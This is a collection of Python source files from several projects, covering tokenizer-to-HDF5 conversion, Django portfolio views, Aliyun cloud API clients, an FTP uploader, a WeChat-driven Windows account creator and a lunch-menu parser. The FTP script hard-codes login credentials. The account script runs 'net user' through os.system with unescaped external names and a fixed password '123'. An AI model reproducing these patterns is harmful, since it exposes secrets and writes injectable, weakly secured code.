print(' '.join(tokenizer.convert_ids_to_tokens(ids)))
print(' '.join(tokenizer.convert_ids_to_tokens(last_tokens)))
assert False, "FAIL"
print("--------------------------------------------")
def to_hdf5(fname, tokenizer_name, validate=True):
print("Process %s" % fname)
h5_file = h5py.File(fname + '.' + tokenizer_name + '.hdf5', 'w')
dset = h5_file.create_dataset("tokens",
(0,),
maxshape=(None,),
dtype='int32')
dump_interval = 1000000
dump_iter = 0
with open('%s.%s' % (fname, tokenizer_name)) as f:
lines = 0
tokens = []
for line in tqdm.tqdm(f):
for token in map(int, line.split(' ')):
tokens.append(token)
if len(tokens) >= dump_interval:
dset.resize((dump_iter + len(tokens),))
dset[dump_iter: dump_iter + len(tokens)] = tokens
dump_iter += len(tokens)
tokens = []
lines += 1
dset.resize((dump_iter + len(tokens),))
dset[dump_iter: dump_iter + len(tokens)] = tokens
dump_iter += len(tokens)
assert len(dset) == dump_iter
h5_file.close()
if validate:
validate_hdf5(fname, tokenizer_name)
print()
``` |
{
"source": "jokieleung/tensorcom",
"score": 2
} |
#### File: tensorcom/test/test_zcom.py
```python
import numpy as np
from tensorcom import zcom
import random
def test_zmq():
port = random.randint(17000, 38999)
source = zcom.Connection(f"zpush://127.0.0.1:{port}")
sink = zcom.Connection(f"zpull://127.0.0.1:{port}")
a = np.random.uniform(size=(9, 7)).astype("float16")
source.send([a, a])
b, c = sink.recv()
del sink
del source
assert (a==b).all()
assert (a==c).all()
``` |
{
"source": "jokimies/django-pj-core",
"score": 2
} |
#### File: django-pj-core/tests/test_tags.py
```python
from django.test import TestCase
from django.template import Context, Template
from pjcore.templatetags.pjcore_tags import PERCENTAGE_DEFAULT_CLASSES
class TagTests(TestCase):
def tag_test(self, template, context, output):
t = Template('{% load pjcore_tags %}'+template)
c = Context(context)
self.assertEqual(t.render(c), output)
def test_colorize_percentage_less_than_zero(self):
template = "{{ value | colorize_percentage}}"
class_negative = PERCENTAGE_DEFAULT_CLASSES['negative']
context = { "value": -1.0 }
self.tag_test(template, context, class_negative)
def test_colorize_percentage_greater_than_zero(self):
template = "{{ value | colorize_percentage}}"
class_positive = PERCENTAGE_DEFAULT_CLASSES['positive']
context = { "value": 1.0 }
self.tag_test(template, context, class_positive)
``` |
{
"source": "jokimies/django-pj-portfolio",
"score": 2
} |
#### File: django-pj-portfolio/portfolio/views.py
```python
import json
from decimal import Decimal
import datetime
import time
import requests
import sys
from django.db.models import Sum
from django.views.decorators.csrf import ensure_csrf_cookie
from django.shortcuts import render, redirect, get_object_or_404
from django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView, TemplateView
from django.utils.decorators import method_decorator
from django.core.exceptions import ImproperlyConfigured
from django.conf import settings
from rest_framework import viewsets, permissions, status
from rest_framework.views import APIView
from rest_framework.response import Response
from portfolio.models import Transaction, Account, Security
from portfolio.forms import BuyForm, DepositWithdrawForm, InterestForm, DivForm, TxnBySecurityForm, AccountForm, TransactionDetailForm
from portfolio.serializers import SecuritySerializer, AccountSerializer
from portfolio.management.commands.update_share_prices import Command
class CustomEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Decimal):
return float(obj)
if isinstance(obj, datetime.datetime):
            return obj.strftime('%Y/%m/%d/%H/%M/%S')
        return super(CustomEncoder, self).default(obj)
class PortfolioMixin(object):
def get_account(self):
        account = get_object_or_404(Account, pk=self.kwargs['account_id'])
return account
def get_context_data(self, **kwargs):
ctx = super(PortfolioMixin, self).get_context_data(**kwargs)
ctx['account'] = self.get_account()
#print ctx
return ctx
class TransactionListView(ListView):
model = Transaction
# https://docs.djangoproject.com/en/dev/topics/class-based-views/generic-display/#dynamic-filtering
def get_queryset(self):
if 'action' in self.kwargs and 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id']).filter(action=self.kwargs['action'].upper())
elif 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id'])
else:
return Transaction.objects.all()
class TransactionDetailView(UpdateView):
model = Transaction
form_class = TransactionDetailForm
success_url = "/portfolio/txn/all"
class TransactionCreateView(CreateView):
model = Transaction
success_url = "/portfolio/txn/all"
class TransactionDeleteView(DeleteView):
model = Transaction
success_url = "/portfolio/txn/all"
class AccountListView(ListView):
model = Account
class AccountDetailView(DetailView):
model = Account
class AccountEditView(UpdateView):
model = Account
form_class = AccountForm
success_url = "/portfolio"
class AccountCreateView(CreateView):
model = Account
form_class = AccountForm
success_url = "/portfolio"
class AccountDeleteView(DeleteView):
model = Account
success_url = "/portfolio"
class DividendListView(ListView):
model = Transaction
template_name = "portfolio/dividend_list.html"
# https://docs.djangoproject.com/en/dev/topics/class-based-views/generic-display/#dynamic-filtering
def get_queryset(self):
if 'action' in self.kwargs and 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id']).filter(action=self.kwargs['action'].upper())
elif 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id'])
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super(DividendListView, self).get_context_data(**kwargs)
divsum = Transaction.objects.filter(account_id=self.kwargs['account_id']).filter(action='DIV').filter(security_id=self.kwargs['security_id']).aggregate(Sum('cash_amount'))
context['divsum'] = divsum['cash_amount__sum']
return context
class DividendYearListView(ListView):
model = Transaction
template_name = "portfolio/dividend_list.html"
def get_queryset(self):
return Transaction.objects.filter(date__year=self.kwargs['year']).filter(action='DIV')
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super(DividendYearListView, self).get_context_data(**kwargs)
divsum = Transaction.objects.filter(date__year=self.kwargs['year']).filter(action='DIV').aggregate(Sum('cash_amount'))
context['divsum'] = divsum['cash_amount__sum']
context['year'] = self.kwargs['year']
return context
class AccountViewSet(viewsets.ModelViewSet):
"""
Returns list of accounts
"""
queryset = Account.objects.all()
serializer_class = AccountSerializer
class SecurityViewSet(viewsets.ModelViewSet):
"""
Returns a list of all securities.
"""
queryset = Security.objects.all()
serializer_class = SecuritySerializer
permission_classes = [
permissions.AllowAny
]
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
Security.objects.create_security(**serializer.validated_data)
return Response(serializer.validated_data, status=status.HTTP_201_CREATED)
return Response({
'status': 'Bad request',
'message': 'Account could not be created with received data.'
}, status=status.HTTP_400_BAD_REQUEST)
class SecurityIndexView(TemplateView):
template_name = 'security_index.html'
@method_decorator(ensure_csrf_cookie)
def dispatch(self, *args, **kwargs):
return super(SecurityIndexView, self).dispatch(*args, **kwargs)
class DividendChartByYearView(APIView):
def get(self, request, *args, **kwargs):
bymonth_select = {"month": """DATE_TRUNC('month', date)"""} # Postgres specific
months = Transaction.objects.extra(select=bymonth_select).filter(action='DIV').filter(date__year=self.kwargs['year']).values('month').annotate(sum_month=Sum('cash_amount')).order_by('month')
div_data = {'months': list(range(1,13)), 'sums': [0]*12}
for data in months:
div_data['sums'][data['month'].month - 1] = data['sum_month']
dataD = {}
dataD['chart_data'] = div_data
result = json.dumps(dataD, cls=CustomEncoder)
response = Response(dataD, status=status.HTTP_200_OK) #, content_type='application/json')
return response
class PositionView(APIView):
"""
APIView to get positions for a certain account
"""
def get(self, request, *args, **kwargs):
"""
Get list of all positions
- **parameters**, **return**::
:param request: ``Request`` instance (from REST framework)
:param kwargs: keyword parameters from URL, specifically ``account_id``
:return: positions dictionary
"""
account = get_object_or_404(Account, pk=kwargs['account_id'])
data = account.get_positions()
return Response(data, status=status.HTTP_200_OK)
class SecurityQuoteView(APIView):
'''Stock quotes from defined provider'''
def get(self, request, *args, **kwargs):
'''
Get stock quote from defined provider
'''
ticker = kwargs['stock']
try:
security = Security.objects.filter(ticker = ticker)[:1].get()
except Security.DoesNotExist:
# Wanted ticker did not exists
return Response({}, status=status.HTTP_200_OK)
cmd = Command()
# Find out price tracker and fetch quote from it
if (security.price_tracker.name == 'Yahoo'):
result = cmd.get_yahoo_stock_quote(ticker)
elif security.price_tracker.name == 'IEXCloud':
result = cmd.get_iexcloud_stock_quote(ticker)
else:
# If not Yahoo, assume AlphaVantage for now
result = cmd.get_alpha_vantage_stock_quote(ticker)
if result:
# Replace Currency object with its printable representation
result['currency'] = result['currency'].iso_code
result['ticker'] = ticker
return Response(result, status=status.HTTP_200_OK)
class ExchangeRatesView(APIView):
'''Get exchange rates'''
def get(self, request, *args, **kwargs):
API_KEY = getattr(settings, 'FIXER_IO_API_KEY', None)
if not API_KEY:
raise ImproperlyConfigured(
'FIXER_IO_API_KEY not set')
response = requests.get('http://data.fixer.io/api/latest?access_key=' +
API_KEY)
try:
decoded_response = response.json()
except:
error = sys.exc_info()[0]
return Response({'error': error}, status=status.HTTP_400_BAD_REQUEST)
finally:
if response.status_code == status.HTTP_200_OK:
return Response(decoded_response, status=status.HTTP_200_OK)
else:
return Response({}, status=status.HTTP_400_BAD_REQUEST)
# Functions
def deposit(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = DepositWithdrawForm()
else:
form = DepositWithdrawForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
cash_amount = form.cleaned_data['cash_amount']
currency = form.cleaned_data['currency']
a.deposit(cash_amount=cash_amount, date=date, security=security,
currency=currency)
return redirect('/portfolio/account/' + account_id + '/')
action_title = "Deposit"
title = action_title + " cash"
return render(request, 'portfolio/deposit_withdraw.html',
{'form': form,
'title': title,
'action_title': action_title,})
def withdraw(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = DepositWithdrawForm()
else:
form = DepositWithdrawForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
cash_amount = form.cleaned_data['cash_amount']
currency = form.cleaned_data['currency']
a.withdraw(cash_amount=cash_amount, date=date, security=security,
currency=currency)
return redirect('/portfolio/account/' + account_id + '/')
action_title = "Withdraw"
title = action_title + " cash"
return render(request, 'portfolio/deposit_withdraw.html',
{'form': form,
'title': title,
'action_title': action_title,})
def buySell(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = BuyForm()
else:
form = BuyForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
shares = form.cleaned_data['shares']
price = form.cleaned_data['price']
action = form.cleaned_data['action']
commission = form.cleaned_data['commission']
currency = form.cleaned_data['currency']
exchange_rate = form.cleaned_data['exchange_rate']
a.buySellSecurity(security=security, shares=shares, date=date,
price=price, commission=commission, action=action,
currency=currency, exchange_rate=exchange_rate)
return redirect('/portfolio/account/' + account_id + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'account': a,
'sub_title': 'Buy or sell'})
def div(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = DivForm()
else:
form = DivForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
price = form.cleaned_data['price']
commission = form.cleaned_data['commission']
cash_amount = form.cleaned_data['cash_amount']
currency = form.cleaned_data['currency']
exchange_rate = form.cleaned_data['exchange_rate']
a.div(security=security, date=date,
price=price, commission=commission,
cash_amount=cash_amount,
currency=currency, exchange_rate=exchange_rate)
return redirect('/portfolio/account/' + account_id + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'account': a,
'sub_title': 'Add dividends',})
def txnByName(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = TxnBySecurityForm()
else:
form = TxnBySecurityForm(request.POST)
if form.is_valid():
security = form.cleaned_data['security']
a.txnByName(security=security)
return redirect('/portfolio/txn/' + account_id + '/byname/' + str(security.id) + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'account': a,
'sub_title': 'Transactions by security'})
def txnDiv(request, account_id):
    a = get_object_or_404(Account, pk=account_id)
    # compute the dividend years up front so 'years' is defined for both GET and POST renders
    years = Account.div_years.div_years(account_id)
    if request.method == 'GET':
        form = TxnBySecurityForm()
else:
form = TxnBySecurityForm(request.POST)
if form.is_valid():
security = form.cleaned_data['security']
sum = Transaction.objects.filter(account_id=account_id).filter(action='DIV').filter(shares__gt=0).aggregate(Sum('cash_amount'))
return redirect('/portfolio/txn/' + account_id + '/div/' + str(security.id) + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'yearly_divs' : True,
'years' : years,
'account' : a,
'sub_title': 'Display dividends'})
def interest(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = InterestForm()
else:
form = InterestForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
amount = form.cleaned_data['amount']
a.receive_interest(amount=amount, date=date)
return redirect('/portfolio/account/' + account_id + '/')
return render(request, 'portfolio/interest.html', {'form': form})
``` |
{
"source": "jokimina/aliyunpy",
"score": 2
} |
#### File: client/api/dns.py
```python
from aliyunsdkalidns.request.v20150109 import DescribeDomainsRequest, \
DescribeDomainRecordsRequest
from .base import BaseAliyunApi
class AliyunDns(BaseAliyunApi):
"""
    Aliyun DNS related APIs
"""
def get_dns_list(self):
"""
        Get the list of domains managed by Aliyun DNS
        :return: list of domains
"""
request = DescribeDomainsRequest.DescribeDomainsRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
first_page_result = self.client.do_action(request)
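        # The first page tells us the total record count; if everything fits in a
        # single page we return right away, otherwise the remaining pages are fetched.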
total_count, page_size = first_page_result['TotalCount'], \
first_page_result['PageSize']
if total_count <= page_size:
return first_page_result['Domains']['Domain']
result_list = first_page_result['Domains']['Domain']
        # integer division so that range() below always receives an int page count
        _page_num = (total_count // page_size) \
            if total_count % page_size == 0 \
            else (total_count // page_size + 1)
for _page in range(2, _page_num + 1):
request.set_PageNumber(_page)
page_result = self.client.do_action(request)
result_list.extend(page_result['Domains']['Domain'])
return result_list
def get_record_count(self, domain_name):
"""
        :return: total number of resolution records for the given domain
"""
request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest()
request.set_accept_format('json')
request.set_DomainName(domain_name)
record_count = self.client.do_action(request)['TotalCount']
return record_count
def get_dns_record(self, domain_name):
"""
        Get the DNS resolution records of a domain
        :param domain_name: second-level domain name
        :return: resolution records of the given domain
"""
request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
request.set_DomainName(domain_name)
first_page_result = self.client.do_action(request)
total_count, page_size = first_page_result['TotalCount'], \
first_page_result['PageSize']
if total_count <= page_size:
return first_page_result['DomainRecords']['Record']
result_list = first_page_result['DomainRecords']['Record']
        # integer division so that range() below always receives an int page count
        _page_num = (total_count // page_size) \
            if total_count % page_size == 0 \
            else (total_count // page_size + 1)
for _page in range(2, _page_num + 1):
request.set_PageNumber(_page)
page_result = self.client.do_action(request)
result_list.extend(page_result['DomainRecords']['Record'])
return result_list
```
#### File: client/api/oss.py
```python
import oss2
from .base import BaseAliyunApi
class AliyunOss(BaseAliyunApi):
default_endpoint = 'http://oss-cn-beijing.aliyuncs.com'
def list_bucket(self):
"""
        List all OSS buckets of the current account
https://help.aliyun.com/document_detail/31957.html?spm=a2c4g.11186623.6.1105.4c9e556cYuWTBJ
:return:
"""
result_list = []
service = oss2.Service(self.client.oss_auth, self.default_endpoint)
result = service.list_buckets()
        result_list.extend(result.buckets)
        # keep fetching pages while the listing is truncated, always using the latest marker
        while result.is_truncated:
            result = service.list_buckets(marker=result.next_marker)
            result_list.extend(result.buckets)
result_list = [r.__dict__ for r in result_list]
return result_list
```
#### File: aliyunpy/tests/config.py
```python
import os
import sys
import re
import inspect
import json
from functools import wraps
import httpretty
def read_fixture(function):
path = os.path.join(os.path.dirname(inspect.getfile(function)) + os.sep + 'fixtures',
                        function.__name__[len('test_'):] + '.json')  # slice off the 'test_' prefix (lstrip strips characters, not a prefix)
with open(path, 'rb') as f:
return f.read()
def auto_set_fixture(path=None, is_json=True):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not path:
fixture = read_fixture(func)
else:
with open(path, 'rb') as f:
fixture = f.read()
if is_json:
fixture = json.loads(fixture)
kwargs.update({'fixture': fixture})
return func(*args, **kwargs)
return wrapper
return decorator
def auto_load_fixture(func):
@wraps(func)
def wrapper(*args, **kwargs):
httpretty.register_uri(httpretty.GET, re.compile(r'^.*\.aliyuncs\.com.*$'), body=read_fixture(func),
content_type='application/json')
return func(*args, **kwargs)
return wrapper
def suppress_warnings(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not sys.warnoptions:
import warnings
warnings.simplefilter("ignore")
return func(*args, **kwargs)
return wrapper
```
#### File: aliyunpy/tests/test_client_bss.py
```python
import json
import datetime
import httpretty
from .base import BaseAliyunTestCase
from .config import auto_load_fixture, suppress_warnings
class AliyunClientBssTestCase(BaseAliyunTestCase):
def test_query_bill(self):
r = self.client.bss.query_bill('2019-01')
print(len(r))
print(sum([x['PaymentAmount'] for x in r]))
# print(json.dumps(r, ensure_ascii=False))
def test_query_bill_overview(self):
r = self.client.bss.query_bill_overview('2019-01')
print(json.dumps(r, ensure_ascii=False))
def test_query_instance_bill(self):
r = self.client.bss.query_instance_bill('2019-01', ProductCode='ecs', SubscriptionType='Subscription',
PageSize=100)
print(json.dumps(r, ensure_ascii=False))
def test_query_instance_gaap_cost(self):
r = self.client.bss.query_instance_gaap_cost(billing_cycle='2019-01')
print(json.dumps(r, ensure_ascii=False))
def test_query_order(self):
# tz_utc_8 = datetime.timezone(datetime.timedelta(hours=0))
order_cycle = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time())
# r = self.client.bss.query_orders(CreateTimeStart=order_cycle)
r = self.client.bss.query_order(CreateTimeStart='2019-01-01T00:00:00Z', CreateTimeEnd='2019-02-01T00:00:00Z')
print(len(r))
print(sum([x['PretaxAmount'] for x in r]))
# print(json.dumps(r, ensure_ascii=False))
def test_get_order_detail(self):
r = self.client.bss.get_order_detail('203269617950649')
print(json.dumps(r, ensure_ascii=False))
```
#### File: aliyunpy/tests/test_client_drds.py
```python
import json
from .base import BaseAliyunTestCase
class AliyunClientDrdsTestCase(BaseAliyunTestCase):
def test_get_regions(self):
r = self.client.drds.get_regions(id_only=True)
print(json.dumps(r, indent=2, ensure_ascii=False))
def test_list_drds(self):
r = self.client.drds.list_drds()
print(json.dumps(r, indent=2, ensure_ascii=False))
```
#### File: aliyunpy/tests/test_client_ecs.py
```python
import re
import json
import httpretty
from aliyunpy.client import AliyunClient
from .config import auto_set_fixture
from .base import BaseAliyunTestCase
class AliyunClientEcsTestCase(BaseAliyunTestCase):
@httpretty.activate
@auto_set_fixture
def test_list_ecs(self, fixture=None):
p1 = fixture[0]
p2 = fixture[1]
httpretty.register_uri(httpretty.GET, re.compile(r'^.*\.aliyuncs\.com.*PageNumber=1.*$'), body=json.dumps(p1),
content_type='application/json', match_querystring=True)
httpretty.register_uri(httpretty.GET, re.compile(r'^.*\.aliyuncs\.com.*PageNumber=2.*$'), body=json.dumps(p2),
content_type='application/json', match_querystring=True)
r1 = self.client.ecs.list_ecs()
self.assertEqual(101, len(r1))
r2 = self.client.ecs.list_ecs(name_only=True)
self.assertEqual(True, all([True if isinstance(x, str) else False for x in r2]))
def test_list_ecs_all_region(self):
r = self.client.ecs.list_ecs()
print(len(r))
def test_get_regions(self):
r = self.client.ecs.get_regions(id_only=True)
print(json.dumps(r, indent=2, ensure_ascii=False))
```
#### File: aliyunpy/tests/test_client_log.py
```python
from .base import BaseAliyunTestCase
class AliyunClientLogTestCase(BaseAliyunTestCase):
def test_list_project(self):
r = self.client.log.list_project()
print(r)
def test_list_logstore(self):
r = self.client.log.list_logstore(project_name='acslog-project-cfb0d65eb7-jlgra')
print([x for x in r if x != 'config-operation-log' and 'py3' not in x])
def test_delete_logstore(self):
project_name = 'acslog-project-cfb0d65eb7-jlgra'
r = self.client.log.list_logstore(project_name=project_name)
dlist = [x for x in r if x != 'config-operation-log' and 'py3' not in x]
for logstore in dlist:
self.client.log_client.delete_logstore(project_name, logstore).log_print()
```
#### File: aliyunpy/tests/test_client_ons.py
```python
import json
from .base import BaseAliyunTestCase
class AliyunClientOnsTestCase(BaseAliyunTestCase):
def test_get_regions(self):
r = self.client.ons.get_regions(id_only=True)
print(json.dumps(r, indent=2, ensure_ascii=False))
def test_get_instances(self):
r = self.client.ons.get_instances()
print(json.dumps(r, indent=2, ensure_ascii=False))
print(len(r))
def test_list_topics(self):
r = self.client.ons.list_topic(instance_id='MQ_INST_1726708279589269_yyyyy8Ak')
print(json.dumps(r, indent=2, ensure_ascii=False))
print(len(r))
def test_list_topic_all(self):
r = self.client.ons.list_topic_all()
print(json.dumps(r, indent=2, ensure_ascii=False))
print(len(r))
``` |
{
"source": "jokimina/miscellany",
"score": 3
} |
#### File: prod/japan/ftpupload.py
```python
import sys
import os
import json
from ftplib import FTP
_XFER_FILE = 'FILE'
_XFER_DIR = 'DIR'
class Xfer(object):
'''
@note: upload local file or dirs recursively to ftp server
'''
def __init__(self):
self.ftp = None
def __del__(self):
pass
def setFtpParams(self, ip, uname, pwd, port = 21, timeout = 60):
self.ip = ip
self.uname = uname
        self.pwd = pwd
self.port = port
self.timeout = timeout
def initEnv(self):
if self.ftp is None:
self.ftp = FTP()
print '### connect ftp server: %s ...'%self.ip
self.ftp.connect(self.ip, self.port, self.timeout)
self.ftp.login(self.uname, self.pwd)
print self.ftp.getwelcome()
def clearEnv(self):
if self.ftp:
self.ftp.close()
print '### disconnect ftp server: %s!'%self.ip
self.ftp = None
def uploadDir(self, localdir='./', remotedir='./'):
if not os.path.isdir(localdir):
return
self.ftp.cwd(remotedir)
for file in os.listdir(localdir):
src = os.path.join(localdir, file)
if os.path.isfile(src):
self.uploadFile(src, file)
elif os.path.isdir(src):
try:
self.ftp.mkd(file)
except:
                    sys.stderr.write('the dir already exists: %s' % file)
self.uploadDir(src, file)
self.ftp.cwd('..')
def uploadFile(self, localpath, remotepath='./'):
if not os.path.isfile(localpath):
return
print '+++ upload %s to %s:%s'%(localpath, self.ip, remotepath)
self.ftp.storbinary('STOR ' + remotepath, open(localpath, 'rb'))
def __filetype(self, src):
if os.path.isfile(src):
index = src.rfind('\\')
if index == -1:
index = src.rfind('/')
return _XFER_FILE, src[index+1:]
elif os.path.isdir(src):
return _XFER_DIR, ''
def upload(self, src):
filetype, filename = self.__filetype(src)
self.initEnv()
if filetype == _XFER_DIR:
self.srcDir = src
self.uploadDir(self.srcDir)
elif filetype == _XFER_FILE:
self.uploadFile(src, filename)
self.clearEnv()
if __name__ == '__main__':
source_dir = sys.argv[1]
    srcDir = r"/data/tools/prod/japan/cdn/" + source_dir
#srcFile = r'C:\sytst\sar.c'
xfer = Xfer()
xfer.setFtpParams('ftp.cdn.twgate.net', 'jmr', 'ij2hu1zh')
xfer.upload(srcDir)
#xfer.upload(srcFile)
```
#### File: python/Windows/createUsers.py
```python
import urllib2
import simplejson as json
import sys
import os
import pypinyin
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
class weChat:
def __init__(self,url,Corpid,Secret):
url = '%s/cgi-bin/gettoken?corpid=%s&corpsecret=%s' % (url,Corpid,Secret)
self.url = url
res = self.url_req(url)
self.token = res['access_token']
def url_req(self,url,method='get',data={}):
if method == 'get':
req = urllib2.Request(url)
res = json.loads(urllib2.urlopen(req).read())
elif method == 'post':
req = urllib2.Request(url,data)
res = json.loads(urllib2.urlopen(req).read())
else:
print 'error request method...exit'
sys.exit()
return res
def get_department(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/department/list?access_token=%s&id=0" % self.token
return self.url_req(url)
def get_department_users(self,department_id,fetch_child=1,status=0):
'''
department_id = 0 部门id
fetch_child = 1 是否递归子部门 1/0
status = 0 0获取全部成员,1获取已关注成员列表,2获取禁用成员列表,4获取未关注成员列表。status可叠加,未填写则默认为0
'''
url = "https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token=%s&department_id=%s&fetch_child=%s&status=%s" % (
self.token,department_id,fetch_child,status)
return self.url_req(url)
def send_message(self,userlist,content,agentid=0):
self.userlist = userlist
self.content = content
url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s' % self.token
data = {
"touser": "",
"toparty": "",
"totag": "",
"msgtype": "text",
"agentid": "0",
"text": {
"content": ""
},
"safe":"0"
}
data['touser'] = userlist
data['agentid'] = agentid
data['text']['content'] = content
data = json.dumps(data,ensure_ascii=False)
# print data
res = self.url_req(url,method='post',data=data)
if res['errmsg'] == 'ok':
            print 'send succeeded!!!'
else:
print 'send failed!!'
print res
def trans_pinyin(self,strings):
return ''.join(pypinyin.lazy_pinyin(strings,errors='ignore'))
if __name__ == '__main__':
#userlist = sys.argv[1]
#content = sys.argv[2:]
#content = '\n'.join(content)
Corpid = 'wx2e73e37a04685fb8'
Secret = '<KEY>'
url = 'https://qyapi.weixin.qq.com'
wechat = weChat(url,Corpid,Secret)
# print json.dumps(wechat.get_department(),indent=2,ensure_ascii=False)
# sys.exit()
# print wechat.url
# print wechat.token
# print json.dumps(wechat.get_department(),ensure_ascii=False,indent=2)
users = []
names = []
# users.extend(wechat.get_department_users(23)["userlist"])
users.extend(wechat.get_department_users(40)["userlist"])
users.extend(wechat.get_department_users(18)["userlist"])
names = [ wechat.trans_pinyin(name["name"]) for name in users ]
names = [ name for name in names if name != '' and len(name) < 20 ]
for user in users :
print user
name = wechat.trans_pinyin(user["name"])
if name != '' and len(name) < 20 :
os.system('net user %s %s /add' % (name,'123'))
os.system('net localgroup wifi %s /add' % name)
else:
print
# print json.dumps(users,ensure_ascii=False,indent=2)
``` |
{
"source": "Jokinen/lunches-backend",
"score": 3
} |
#### File: lunches-backend/mobileparser/unica.py
```python
__version__ = '0.5.2'
import logging
import requests
from requests.exceptions import RequestException
#import lxml
import re
import datetime
from bs4 import BeautifulSoup as bs
from parser_exceptions import *
from parser_abc import Parser, Restaurant, Day, Food
from restaurant_urls import UNICA_RESTAURANTS as unica_urls
__foodmenu_list__ = "#content .pad .menu-list"
__foodlists__ = "#content .pad .menu-list .accord"
__opening_times__ = "#content .pad.mod .threecol"
__restaurant_infos__ = "div#maplist ul.append-bottom li.color"
__week_number__ = "#content .pad .head2"
class Unica(Parser):
# @abstractmethod
def __init__(self):
super(Unica, self).__init__("Unica", __version__)
self.logger = logging.getLogger(" {0}".format(__name__))
# @abstractmethod
def parse(self):
parse_results = []
for url in unica_urls:
page = self.load_page(url["url_fi"])
if page == 1:
# page could not be loaded, move on to next url
continue
soup = bs(page.text, 'html.parser')
restaurant, error = self.parse_page(soup, url["url_fi"])
restaurant.restaurant_info["name"] = url["name"]
restaurant.restaurant_info["id"] = url["id"]
restaurant.restaurant_info["chain"] = "unica"
if error:
self.logger.debug("Restaurant foods were not found")
parse_results.append(restaurant)
parse_date = str(datetime.date.today())
return {
"restaurants": parse_results,
"parser_version": self.version,
"parser_name": self.name,
"parse_date": parse_date
}
# @abstractmethod
def parse_page(self, soup, link):
parse_year = datetime.date.today().year
if self.assert_foodlist_exists(soup):
week_number = self.parse_week_number(soup)
weekly_foods = self.parse_foods(soup)
restaurant_info = self.parse_restaurant_info(soup, link)
restaurant = Restaurant(restaurant_info,
weekly_foods,
week_number,
parse_year)
return restaurant, False
else:
week_number = datetime.date.today().isocalendar()[1]
restaurant_info = self.parse_restaurant_info(soup, link)
restaurant = Restaurant(restaurant_info,
[],
week_number,
parse_year)
return restaurant, True
def parse_foods(self, soup):
weekly_foods = {}
week_days = soup.select(__foodlists__)
for index, day in enumerate(week_days):
try:
day_name = self.encode_remove_eol(day.h4.getText())
day_number = index
lunch_elements = day.table.select(".lunch")
diet_elements = day.table.select(".limitations")
price_elements = day.table.select(".price")
try:
alert_element = self.encode_remove_eol(day.table.find(
"span", {"class": "alert"}).getText())
except AttributeError, e:
# alert element not found
alert_element = ""
daily_lunches = [self.encode_remove_eol(x.getText())
for x in lunch_elements]
daily_diets = [self.encode_remove_eol(x.getText())
for x in diet_elements]
daily_prices = [re.findall(r"\d\,\d\d", self.encode_remove_eol(
x.getText())) for x in price_elements]
daily_foods = [Food(name, diets, prices)
for name, diets, prices in zip(daily_lunches,
daily_diets,
daily_prices)]
weekly_foods[str(day_number)] = Day(
day_name, day_number, daily_foods, alert_element)
except Exception, e:
self.logger.exception(e)
return weekly_foods
def parse_opening_times(self, soup):
# contains opening hours
opening_hours_elements = soup.select(__opening_times__)
if len(opening_hours_elements) == 0:
return {}
weekdays = ['ma', 'ti', 'ke', 'to', 'pe', 'la', 'su']
if len(opening_hours_elements) > 1:
for section in opening_hours_elements:
section_title = str(
self.encode_remove_eol(section.h3.get_text()))
if section_title.lower() == 'lounas':
opening_times_element = section
else:
opening_times_element = opening_hours_elements[0]
# sanitize and split the initial string
days_hours = self.parse_opening_data(
opening_times_element.p.get_text())
days_hours = self.encode_split_newline(days_hours)
# apply hotfixes to the data here, as needed
days_hours = map(self.patch_data, days_hours)
self.logger.debug(days_hours)
opening_dates = {}
for elem in days_hours:
elem_days = elem.split(' ')[0]
elem_hours = elem.split(' ')[1]
if len(elem_days) and len(elem_hours):
days = []
if '-' in elem_days:
start_index = weekdays.index(
elem_days.split('-')[0].lower())
end_index = weekdays.index(
elem_days.split('-')[1].lower()) + 1
days.append(weekdays[start_index:end_index])
else:
if '-' in elem_hours:
days.append([elem_days.lower()])
else:
break
elem_hours = self.sanitize_opening_hour(elem_hours)
elem_hours = map(self.parse_hours, elem_hours.split('-'))
for day in days[0]:
if len(day) == 2:
opening_dates[day] = (elem_hours[0], elem_hours[1])
self.logger.debug(opening_dates)
return opening_dates
def parse_opening_data(self, data):
sanitized = data
if len(sanitized):
if data[-1] == ',' or data[-1] == ' ':
sanitized = sanitized[:-1] + '\n'
sanitized = sanitized.replace(' -', '-').replace(', ', '\n')
return sanitized
def parse_hours(self, hours):
